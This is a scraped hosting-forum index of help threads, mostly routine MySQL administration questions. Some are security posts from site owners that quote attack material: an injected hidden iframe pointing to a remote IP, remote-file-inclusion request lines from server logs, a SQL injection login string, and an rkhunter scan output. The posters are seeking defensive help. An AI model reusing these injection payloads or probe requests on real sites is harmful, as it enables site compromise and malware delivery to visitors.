Knowledge Of Mysql Exploit Or Mysql Injection?

Jan 17, 2008

Can someone recommended me some one with knowledge of mysql exploit or mysql injection, it seem to our VB forum have issue with database load..

View 5 Replies


ADVERTISEMENT

How To Protect MySQL Database From My SQL Injection Attacks

Apr 11, 2009

some body attacking on my server and changing my users profile name /password or any other information so How To Protect MySQL Database From My SQL Injection Attacks? i have dedicate server i provide free wap sites to people with wildcard dns system and i have ConfigServer Security & Firewall installed.

View 3 Replies View Related

I Moved Mysql From /var To /backup/mysql, Mysql Is No Longer Working

May 8, 2009

Since my /var partition is full, so I moved /var/lib/mysql to /backup/mysql/.

Seems all the files are copied and I changed my.cnf reboot mysql, but all the web sites using db is not working anymore..

View 4 Replies View Related

Installed MySQL In /usr/local/mysql But Error In /var/lib/mysql

Jan 21, 2007

I installed the MySQL binary packages in /usr/local/mysql/ after removing the MySQL RPM package. MySQL is functioning when I executed /usr/local/mysql/bin/safe_mysqld. I reinstalled MySQL before I installed PHP. When I used a PHP script to access a MySQL database, it outputs an error:

Code:
Warning: mysqli::mysqli() [function.mysqli-mysqli]: (HY000/2002): can't connect to local mysql server through socket /var/lib/mysql/mysql.sock in index.php on line 2
However, I installed MySQL in /usr/local/mysql, not in /var/lib/mysql. How do I fix MySQL?

View 1 Replies View Related

Mysql.sock Gone And Mysql Restart Doesn't Create It

Jun 16, 2008

For some reason mysql wont start, i have tried restarting mysql but it wont, it says FAILED. The mysql.sock file seems to have disappeared and i cannot find it anywhere.

View 5 Replies View Related

How To Restore Mysql Databases From /var/lib/mysql/user_database/ Files Only

Feb 11, 2008

I recently had a harddrive failure and luckliy I can still access certain directories on this failed drive. I can still access the /var/lib/mysql/ directory which holds all the users databases and have backed all these up separately using tar.

Now what I need to know is how do you restore these database files to another server? I tried simply untar'ing one of these to the new servers /var/lib/mysql/ direcotry and it stuffed Mysql up - it went offline. I had to get a cpanel tech to bring Mysql back online.

how can I get these database files to fully work on a new server?

View 2 Replies View Related

MySQL Monitor Shows MySQL As Offline When It's Not

Jan 15, 2007

I've been racking my brains with this problem for the last couple of months and have made zero progress. I've asked a lot of people if they know what might be wrong here, but none of them have any idea.

Basically, the problem is that any sort of service monitor I put on my server shows MySQL as being down/offline, even when I know for sure it's up and running perfectly fine. All other services report a green light.

The mysqld service is running on port 3306, which is open both inbound and outbound on my APF config, so as far as I can tell it's nothing to do with the firewall (I won't rule that out though).

The other odd thing is that MySQL shows a green light within WHM, but not anywhere else.

Does anyone know what might be wrong here? Am I missing something entirely fundamental and obvious?

View 11 Replies View Related

Do You Need A Lot Of Knowledge For VPS

Aug 4, 2008

I've run a Linux box for ages with a local web server. Okay, it's not set up like a proper full-on web server but I understand the basics of Linux.

I have a couple of shared accounts and need to upgrade the requirements so am looking at either reseller or VPS (Linux). I know VPS is in essence like a dedicated server. If you pay a hosting company for VPS is the onus on you to do more than you would for shared or is it just that you have more control (installing third party apps, compiling from source, etc)? Do you need more expertise? Is it still usually done by cPanel?

Do the hosters still handle things such as spam, firewall set up and virus protesction?

View 13 Replies View Related

Can I Move /var/lib/mysql To /home/mysql

Apr 15, 2009

my /var partition is full,

im not sure if any files i can remove to get more free space on /var partition.

because there are more free space on /home,

i think if i can move all the /var/lib/mysql to /home/mysql,

if yes,howcan i move it and do any change,

can let the sql data do not lose,

andrun well in the feature ?

View 14 Replies View Related

Uninstall MySQL 3.23 And Install MySQL 5.0

Mar 28, 2007

I've rented a dedicated server that comes with Red Hat Enterprise Linux 4 and MySQL 3.23 but I need at least MySQL 4.1 or higher. My knowledge about GNU/Linux is very limited, so I've read some documents at mysql.com and now I think I have to follow these steps:

1. Uninstall MySQL 3.23 with this command line:
shell> rpm -e mysql-*.rpm

2. Install the server and client RPMs of MySQL 5.0:
shell> rpm -i MySQL-server-VERSION.i386.rpm
shell> rpm -i MySQL-client-VERSION.i386.rpm

View 2 Replies View Related

Easy To Upgrade From MySQL 4.1 To MySQL 5

Jun 13, 2007

I have a number of web sites on a dedicated server. Some of these web sites are a few years old. Are there any issues upgrading from MySQL 4.1 to 5.x? Are there web sites that may have compatibility issues?

View 6 Replies View Related

MySQL Error : MySQL Server Has Gone Away

Dec 18, 2007

I keep getting this error :
MySQL Error : MySQL server has gone away

How do I fix it?

my.cnf contents

Quote:

[mysqld]
safe-show-database
old_passwords
back_log = 75
skip-innodb
max_connections = 800
key_buffer = 48M
myisam_sort_buffer_size = 64M
join_buffer_size = 1M
read_buffer_size = 1M
sort_buffer_size = 2M
table_cache = 3000
thread_cache_size = 128
wait_timeout = 90
connect_timeout = 30
tmp_table_size = 128M
max_heap_table_size = 64M
max_allowed_packet = 256M
net_buffer_length = 16384
max_connect_errors = 10
thread_concurrency = 4
read_rnd_buffer_size = 786432
bulk_insert_buffer_size = 8M
query_cache_limit = 3M
query_cache_size = 48M
query_cache_type = 1
query_prealloc_size = 262144
query_alloc_block_size = 65536
transaction_alloc_block_size = 8192
transaction_prealloc_size = 4096
default-storage-engine = MyISAM
max_user_connections = 500

[mysqld_safe]
nice = -5
open_files_limit = 8192

[mysqldump]
quick
max_allowed_packet = 16M

[myisamchk]
key_buffer = 64M
sort_buffer = 64M
read_buffer = 16M
write_buffer = 16M

[mysqlhotcopy]
interactive-timeout

View 5 Replies View Related

Your PHP MySQL Library Version 5.0.75 Differs From Your MySQL Server Version

Jun 27, 2009

I have recently upgraded mysql server from 5.0.75 to 5.1.31 on my Ubuntu server 9.04 32 bit. After that when I am running phpmyadmin it is printing a warning :

Your PHP MySQL library version 5.0.75 differs from your MySQL server version 5.1.31.

View 2 Replies View Related

Upgrade From MySQL 4 To MySQL 5

Jun 3, 2008

I'm trying to upgrade from MySQL 4 to MySQL 5 for performance reasons. MySQL 4 was working great so I decided to just go ahead and upgrade to MySQL 5 via CPanel. The upgrade appeared to go fine however I now get this error when trying to start MySQL.

/usr/bin/mysqladmin: connect to server at 'localhost' failed error: 'Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (2)' Check that mysqld is running and that the socket: '/var/lib/mysql/mysql.sock' exists! mysql has failed, please contact the sysadmin (result was "Warning, no valid mysql.sock file found.mysql has failed").

I went ahead and did a forced re-install of MySQL 5, but that didn't help. Apache has been updated as well since then, but that did no good, and the MySQL process isn't starting at all.

Its CENTOS with PHP5.

View 1 Replies View Related

Difference Between --with-mysql And --with-mysql=dir

Jun 21, 2007

I am not sure what difference between --with-mysql and --with-mysql=/usr to compile php 4.4.7

because I get error message when I use --with-mysql=/usr

the error message is like Mysql header can not be found or similar thing.

it ok when I use --with-mysql

so, I am afraid that can I use php and mysql without problem by using --with-mysql?

View 1 Replies View Related

Upgrade Mysql MySQL 4.1 To 5

Jan 20, 2007

I'd like to upgrade my current mysql 4.1 version to mysl 5, but i can't find a good tutorial or explenation! I've been searching for hours now without any good results.
I've downloaded the lastest stable mysql 5 .rpm, and tried to install it with rpm -i mysql.version.rpm, but it says the following:

# rpm -i MySQL-server-standard-5.0.27-0.rhel4.i386.rpm
warning: MySQL-server-standard-5.0.27-0.rhel4.i386.rpm: V3 DSA signature: NOKEY, key ID 5072e1f5
error: Failed dependencies:
MySQL conflicts with mysql-4.1.20-1.RHEL4.1.i386
MySQL-server conflicts with mysql-server-4.1.20-1.RHEL4.1.i386

I guess that means i have to uninstall mysql 4.1 first.

ok...

# rpm -e mysql-server-4.1.20-1.RHEL4.1.i386
warning: /var/log/mysqld.log saved as /var/log/mysqld.log.rpmsave

Let's try to install it now.

# rpm -i MySQL-server-standard-5.0.27-0.rhel4.i386.rpm
warning: MySQL-server-standard-5.0.27-0.rhel4.i386.rpm: V3 DSA signature: NOKEY, key ID 5072e1f5
error: Failed dependencies:
MySQL conflicts with mysql-4.1.20-1.RHEL4.1.i386

Ok, let's remove that.

# rpm -e mysql-4.1.20-1.RHEL4.1.i386
error: Failed dependencies:
libmysqlclient.so.14 is needed by (installed) perl-DBD-MySQL-2.9004-3.1.i386
libmysqlclient.so.14 is needed by (installed) dovecot-0.99.11-4.EL4.i386
libmysqlclient.so.14 is needed by (installed) php-mysql-4.3.9-3.22.i386
libmysqlclient.so.14(libmysqlclient_14) is needed by (installed) dovecot-0.99.11-4.EL4.i386
libmysqlclient.so.14(libmysqlclient_14) is needed by (installed) php-mysql-4.3.9-3.22.i386
mysql = 4.1.20-1.RHEL4.1 is needed by (installed) mysql-devel-4.1.20-1.RHEL4.1.i386

Does upgrade work?

# rpm -Uvh MySQL-server-standard-5.0.27-0.rhel4.i386.rpm warning: MySQL-server-standard-5.0.27-0.rhel4.i386.rpm: V3 DSA signature: NOKEY, key ID 5072e1f5
error: Failed dependencies:
libmysqlclient.so.14 is needed by (installed) perl-DBD-MySQL-2.9004-3.1.i386
libmysqlclient.so.14 is needed by (installed) dovecot-0.99.11-4.EL4.i386
libmysqlclient.so.14 is needed by (installed) php-mysql-4.3.9-3.22.i386
libmysqlclient.so.14(libmysqlclient_14) is needed by (installed) dovecot-0.99.11-4.EL4.i386
libmysqlclient.so.14(libmysqlclient_14) is needed by (installed) php-mysql-4.3.9-3.22.i386

Clearly not.

How do i upgrade mysql?

View 1 Replies View Related

Ugrading From Mysql 4.0.x To Mysql 5.0.x

Feb 16, 2007

I have a big issue importing 4.0 databases with mysql 5.0.27.

I did a mysqldump -pxxxxx --force --all-databases > file.sql on server with mysql 4.0

But when I tried to import the file on server with mysql 5.0, this is what I got:

ERROR 1064 (42000) at line 2: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'database' at line 1

I even tried to force import and I got:
ERROR 1046 (3D000) at line x: No database selected for every database.
I checked sql file and CREATE DATABASE xx and USE xx were both added.

I tried this with a single database and worked but with all not

View 6 Replies View Related

Mysql And Php: What If "Client API Version" Doesn't Match Mysql Version

Jun 1, 2007

loading a phpinfo() shows that the mysql variable "Client API version" on my server doesn't match the version of mysql installed ( 4.0.20 when mysql version is 4.1.21).

Can this cause trouble and php or mysql errors on scripts i'm running?

View 0 Replies View Related

Sql Injection

Jul 8, 2009

I had a non client send me an email about being hacked. apparently the hacker is using a program/command line and is entering this into the db:

user=' &pass1=111-222-1933email@adress.tst&pass2=test&submit=
create%20Account

any way he can patch up his navicat database to stop this?

View 9 Replies View Related

URL Injection

Aug 17, 2007

I've experienced so much hacker attack lately. Hosted wiht hostforweb.com if that makes any difference.

Last issue I have is:
Type of attack: URL Injection -- attempt to inject / load files onto the
server via PHP/CGI vulnerabilities

How I can secure my server against such attacks?

Also I need to resolve this issue ASAP but can not find the file and I don't know what to do.

Report:

Sample log report including date and time stamp:

Request: rosemarythecelticlady.com 64.202.102.218 - - [13/Aug/2007:11:50:03
-0500] GET
/awstats/data/awstats1...marythecelticlady.com.txt/admin/index.php?o=[url]HTTP/1.1 302 228 - libwww-perl/5.808 - -

Request: rosemarythecelticlady.com 64.202.102.218 - - [13/Aug/2007:11:50:04
-0500] GET /admin/index.php?o=[url]HTTP/1.1
302 228 - libwww-perl/5.808 - -

Request: rosemarythecelticlady.com 64.202.102.218 - - [13/Aug/2007:11:50:04
-0500] GET
/awstats/data/admin/index.php?o=[url]
HTTP/1.1 302 228 - libwww-perl/5.808 - -

WHAT NEEDS TO BE DONE HERE and where to located it? Your help is greatly appreciated.

View 0 Replies View Related

Iframe Injection

Jul 22, 2009

Yesterday it was discovered that a website had most or all of the html pages compromised with some sort of iframe injection. Every page had an iframe line added to the bottom that attempted to load something from another website. It was coming from a domain called reycross.net and was attempting to load the html/framer virus into the visitor's computer.

The problem is that I cannot identify how the injection hit the system. Here are the facts I can provide...

1. The server does NOT have Joomla or Wordpress.

2. The injection seemed to hit every html page whether the page was active on the site or not.

3. The injection hit only one account.

I have checked /var/log/messages and /var/log/secure and find nothing.

What I don't have is proper ftp logging to determine whether the injection came from that method.

Additional notes: Shortly before the injection took place the box was updated to the latest version of cpanel. Also php was upgraded to 5.2.10. At the time suPHP was enabled but unfortunately had to be disabled because it created problems with another site. Prior to this suPHP was disabled as well.

I went through and removed all instances of this iframe injection and ran another update of cpanel. I also recompiled apache/php and went back to 5.2.8 in case the problem was php related.

View 13 Replies View Related

PhpMyAdmin SQL Injection

Dec 13, 2008

Anyone using phpMyAdmin for MySQL admin, you need to know about a newly discovered attack vector.

Here's the official announcement: [url]

The key to this is in their description, "A logged-in user can be subject of SQL injection through cross site request forgery. Several scripts in phpMyAdmin are vulnerable and the attack can be made through table parameter."

A logged in user... This attack is a combination of SQL injection through CSRF. In other words, you'd have to be logged into your phpMyAdmin program, hit a website setup for CSRF, and then the attacker could have access to your phpMyAdmin as you.

If there's interest here, I could write up a detailed description of CSRF and how to prevent this type of attack.

Just let me know...

You should upgrade immediately to either phpMyAdmin 2.9.11.4 or 3.1.1.0 or apply patch 12100.

View 9 Replies View Related

Iframe Injection

Jun 9, 2007

One of my site index page is having iframe injections. I am not sure about the reason. page is chmod to 644 under php.ini dl() is even disabled.

But still person is some how able to inject iframe that redirects the page to some other url.

Any suggestions how to fix that ? any mod_rewrite rule or anything for this?

View 9 Replies View Related

Reverse Proxy And SQL Injection

Jun 30, 2009

Does deploying a reverse proxy in front of the web/db server reduce the threat of SQL injection?

Emphasis on 'reduce' the threat - or does it provide no help at all?

View 3 Replies View Related

Php Injection & Session Hacking

May 28, 2008

I had done a program in early 2006 for a site in php-mysql. At the time of doing the code, The code written was not so standard and it contained uninitialized variables used for include file paths (eventhough values are assigned to it before using) and the "sess" folder was created within the website folder. Also the parameters for the SQL query were not escaped, but everything was working fine.

And now i was informed that the insecure code in my program caused the server crash and i have to pay the penalty for the same. Can anyone let me know whether the below code / keeping the session variables within a folder inside the /www/ will make the sites hosted on the server where this program runs to stop/crash for ever ?

------------------------------------------------------------------
function update_region($id,$regname,$regcom)
{
$query = "UPDATE taxregion_mast SET taxregion_name = '". $regname."',
region_comments = '". $regcom."' WHERE region_id =" .$id;
mysql_query($query);

......
-------------------------------------------------------------------

View 3 Replies View Related

Prevention LFI And SQL Injection Attacks

May 12, 2008

i am seeing a lot of Local file inclusion (LFI) and mysql injection attacks quite often directed to php scripts.

what is the way to prevent them? would installing mod_security to apache work?

View 6 Replies View Related

Does CISCO ASA Firewall Block SQL And XSS Injection?

Dec 25, 2008

Does CISCO ASA Firewall block SQL and XSS Injection? If not, then which are the firewalls available which do this job. I have checked web application firewalls and found them to be too costly for my budget. What are the other cheap options available?

View 3 Replies View Related

Win 2003 + Mssql Attacks Injection

Jun 2, 2008

I see on one server with windows 2k3 and sql 2000 alot of Injection attemts(lucky so far) and 90% come from china.

Is there any way on iis6 to put range ban like 123.52.0.0 - 123.55.255.255 so to ban all that network?

View 1 Replies View Related

Iframe Injection And Rkhunter Warnings

Aug 25, 2007

I have a major problem with injecting iframes into every files (header.php footer.php index.php login.php and vars.php ) on all server account.

Code:
<iframe src='h t t p : / / 8 1 . 9 5 . 1 4 5 . 2 4 0 / g o . p h p ? s i d = 1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
what is the reason and how to fix that ?


and I have the second problem is the rkhunter warnings I am not sure if that have relations with the first problem :
rkhunter results:

Code:
Checking system commands...

Performing 'strings' command checks
Checking 'strings' command [ OK ]

Performing 'shared libraries' checks
Checking for preloading variables [ None found ]
Checking for preload file [ Not found ]
Checking LD_LIBRARY_PATH variable [ Not found ]

Performing file properties checks
Checking for prerequisites [ Warning ]
/bin/awk [ OK ]
/bin/basename [ OK ]
/bin/bash [ OK ]
/bin/cat [ OK ]
/bin/chmod [ OK ]
/bin/chown [ OK ]
/bin/cp [ OK ]
/bin/csh [ OK ]
/bin/cut [ OK ]
/bin/date [ OK ]
/bin/df [ OK ]
/bin/dmesg [ OK ]
/bin/echo [ OK ]
/bin/ed [ OK ]
/bin/egrep [ OK ]
/bin/env [ OK ]
/bin/fgrep [ OK ]
/bin/grep [ OK ]
/bin/kill [ OK ]
/bin/login [ OK ]
/bin/ls [ OK ]
/bin/mail [ OK ]
/bin/mktemp [ OK ]
/bin/more [ OK ]
/bin/mount [ OK ]
/bin/mv [ OK ]
/bin/netstat [ OK ]
/bin/passwd [ OK ]
/bin/ps [ OK ]
/bin/pwd [ OK ]
/bin/rpm [ OK ]
/bin/sed [ OK ]
/bin/sh [ OK ]
/bin/sort [ OK ]
/bin/su [ OK ]
/bin/touch [ OK ]
/bin/uname [ OK ]
/bin/gawk [ OK ]
/bin/tcsh [ OK ]
/usr/bin/awk [ OK ]
/usr/bin/chattr [ OK ]
/usr/bin/curl [ OK ]
/usr/bin/cut [ OK ]
/usr/bin/diff [ OK ]
/usr/bin/dirname [ OK ]
/usr/bin/du [ OK ]
/usr/bin/env [ OK ]
/usr/bin/file [ OK ]
/usr/bin/find [ OK ]
/usr/bin/GET [ Warning ]
/usr/bin/groups [ Warning ]
/usr/bin/head [ OK ]
/usr/bin/id [ OK ]
/usr/bin/kill [ OK ]
/usr/bin/killall [ OK ]
/usr/bin/last [ OK ]
/usr/bin/lastlog [ OK ]
/usr/bin/ldd [ Warning ]
/usr/bin/less [ OK ]
/usr/bin/locate [ OK ]
/usr/bin/logger [ OK ]
/usr/bin/lsattr [ OK ]
/usr/bin/lynx [ OK ]
/usr/bin/md5sum [ OK ]
/usr/bin/newgrp [ OK ]
/usr/bin/passwd [ OK ]
/usr/bin/perl [ OK ]
/usr/bin/pstree [ OK ]
/usr/bin/readlink [ OK ]
/usr/bin/runcon [ OK ]
/usr/bin/sha1sum [ OK ]
/usr/bin/size [ OK ]
/usr/bin/slocate [ OK ]
/usr/bin/stat [ OK ]
/usr/bin/strace [ OK ]
/usr/bin/strings [ OK ]
/usr/bin/sudo [ OK ]
/usr/bin/tail [ OK ]
/usr/bin/test [ OK ]
/usr/bin/top [ OK ]
/usr/bin/tr [ OK ]
/usr/bin/uniq [ OK ]
/usr/bin/users [ OK ]
/usr/bin/vmstat [ OK ]
/usr/bin/w [ OK ]
/usr/bin/watch [ OK ]
/usr/bin/wc [ OK ]
/usr/bin/wget [ OK ]
/usr/bin/whatis [ Warning ]
/usr/bin/whereis [ OK ]
/usr/bin/which [ OK ]
/usr/bin/who [ OK ]
/usr/bin/whoami [ OK ]
/usr/bin/gawk [ OK ]
/sbin/chkconfig [ OK ]
/sbin/depmod [ OK ]
/sbin/ifconfig [ OK ]
/sbin/ifdown [ Warning ]
/sbin/ifup [ Warning ]
/sbin/init [ OK ]
/sbin/insmod [ OK ]
/sbin/ip [ OK ]
/sbin/lsmod [ OK ]
/sbin/modinfo [ OK ]
/sbin/modprobe [ OK ]
/sbin/nologin [ OK ]
/sbin/rmmod [ OK ]
/sbin/runlevel [ OK ]
/sbin/sulogin [ OK ]
/sbin/sysctl [ OK ]
/sbin/syslogd [ OK ]
/usr/sbin/adduser [ OK ]
/usr/sbin/chroot [ OK ]
/usr/sbin/groupadd [ OK ]
/usr/sbin/groupdel [ OK ]
/usr/sbin/groupmod [ OK ]
/usr/sbin/grpck [ OK ]
/usr/sbin/kudzu [ OK ]
/usr/sbin/lsof [ OK ]
/usr/sbin/prelink [ OK ]
/usr/sbin/pwck [ OK ]
/usr/sbin/tcpd [ OK ]
/usr/sbin/useradd [ OK ]
/usr/sbin/userdel [ OK ]
/usr/sbin/usermod [ OK ]
/usr/sbin/vipw [ OK ]
/usr/sbin/xinetd [ OK ]
/usr/local/bin/perl [ OK ]
/usr/local/bin/rkhunter [ OK ]

Checking for rootkits...

Performing check of known rootkit files and directories
55808 Trojan - Variant A [ Not found ]
ADM Worm [ Not found ]
AjaKit Rootkit [ Not found ]
aPa Kit [ Not found ]
Apache Worm [ Not found ]
Ambient (ark) Rootkit [ Not found ]
Balaur Rootkit [ Not found ]
BeastKit Rootkit [ Not found ]
beX2 Rootkit [ Not found ]
BOBKit Rootkit [ Not found ]
CiNIK Worm (Slapper.B variant) [ Not found ]
Danny-Boy's Abuse Kit [ Not found ]
Devil RootKit [ Not found ]
Dica-Kit Rootkit [ Not found ]
Dreams Rootkit [ Not found ]
Duarawkz Rootkit [ Not found ]
Enye LKM [ Not found ]
Flea Linux Rootkit [ Not found ]
FreeBSD Rootkit [ Not found ]
****`it Rootkit [ Not found ]
GasKit Rootkit [ Not found ]
Heroin LKM [ Not found ]
HjC Kit [ Not found ]
ignoKit Rootkit [ Not found ]
ImperalsS-FBRK Rootkit [ Not found ]
Irix Rootkit [ Not found ]
Kitko Rootkit [ Not found ]
Knark Rootkit [ Not found ]
Li0n Worm [ Not found ]
Lockit / LJK2 Rootkit [ Not found ]
Mood-NT Rootkit [ Not found ]
MRK Rootkit [ Not found ]
Ni0 Rootkit [ Not found ]
Ohhara Rootkit [ Not found ]
Optic Kit (Tux) Worm [ Not found ]
Oz Rootkit [ Not found ]
Phalanx Rootkit [ Not found ]
Phalanx Rootkit (strings) [ Not found ]
Portacelo Rootkit [ Not found ]
R3dstorm Toolkit [ Not found ]
RH-Sharpe's Rootkit [ Not found ]
RSHA's Rootkit [ Not found ]
Scalper Worm [ Not found ]
Sebek LKM [ Not found ]
Shutdown Rootkit [ Not found ]
SHV4 Rootkit [ Not found ]
SHV5 Rootkit [ Not found ]
Sin Rootkit [ Not found ]
Slapper Worm [ Not found ]
Sneakin Rootkit [ Not found ]
Suckit Rootkit [ Not found ]
SunOS Rootkit [ Not found ]
SunOS / NSDAP Rootkit [ Not found ]
Superkit Rootkit [ Not found ]
TBD (Telnet BackDoor) [ Not found ]
TeLeKiT Rootkit [ Not found ]
T0rn Rootkit [ Not found ]
Trojanit Kit [ Not found ]
Tuxtendo Rootkit [ Not found ]
URK Rootkit [ Not found ]
VcKit Rootkit [ Not found ]
Volc Rootkit [ Not found ]
X-Org SunOS Rootkit [ Not found ]
zaRwT.KiT Rootkit [ Not found ]

Performing additional rootkit checks
Suckit Rookit additional checks [ OK ]
Checking for possible rootkit files and directories [ None found ]
Checking for possible rootkit strings [ None found ]

Performing malware checks
Checking running processes for suspicious files [ None found ]
Checking for login backdoors [ None found ]
Checking for suspicious directories [ None found ]
Checking for sniffer log files [ None found ]

Performing trojan specific checks
Checking for enabled xinetd services [ None found ]
Checking for Apache backdoor [ Not found ]

Performing Linux specific checks
Checking kernel module commands [ OK ]
Checking kernel module names [ OK ]
Checking the network...

Performing check for backdoor ports
Checking for UDP port 2001 [ Not found ]
Checking for TCP port 2006 [ Not found ]
Checking for TCP port 2128 [ Not found ]
Checking for TCP port 14856 [ Not found ]
Checking for TCP port 47107 [ Not found ]
Checking for TCP port 60922 [ Not found ]

Performing checks on the network interfaces
Checking for promiscuous interfaces [ None found ]

Checking the local host...

Performing system boot checks
Checking for local host name [ Found ]
Checking for local startup files [ Found ]
Checking local startup files for malware [ None found ]
Checking system startup files for malware [ None found ]

Performing group and account checks
Checking for passwd file [ Found ]
Checking for root equivalent (UID 0) accounts [ None found ]
Checking for passwordless accounts [ None found ]
Checking for passwd file changes [ None found ]
Checking for group file changes [ None found ]
Checking root account shell history files [ OK ]

Performing system configuration file checks
Checking for SSH configuration file [ Found ]
Checking if SSH root access is allowed [ Warning ]
Checking if SSH protocol v1 is allowed [ Warning ]
Checking for running syslog daemon [ Found ]
Checking for syslog configuration file [ Found ]
Checking if syslog remote logging is allowed [ Not allowed ]

Performing filesystem checks
Checking /dev for suspicious file types [ None found ]
Checking for hidden files and directories [ Warning ]
Checking application versions...

Checking version of Exim MTA [ OK ]
Checking version of GnuPG [ Warning ]
Checking version of Apache [ Skipped ]
Checking version of Bind DNS [ OK ]
Checking version of OpenSSL [ Warning ]
Checking version of PHP [ OK ]
Checking version of Procmail MTA [ OK ]
Checking version of OpenSSH [ OK ]

System checks summary
=====================

File properties checks...
Required commands check failed
Files checked: 129
Suspect files: 6

Rootkit checks...
Rootkits checked : 114
Possible rootkits: 0

Applications checks...
Applications checked: 8
Suspect applications: 2

The system checks took: 3 minutes and 12 seconds

All results have been written to the logfile (/var/log/rkhunter.log)

One or more warnings have been found while checking the system.

Please check the log file (/var/log/rkhunter.log)

View 5 Replies View Related

Java Script Injection On Html Pages

Jan 11, 2008

We are facing this strange Problem from yesterday that

<script language=javascript src= [url]
is added on end of every html Pages.

I don,t know that how this Injection on every Html Pages.

View 1 Replies View Related

Cacti Command Execution And SQL Injection Vulnerabilities

Jan 14, 2007

Cacti version 0.8.6i has vulnerability: [url]

Solution: [url]

View 2 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved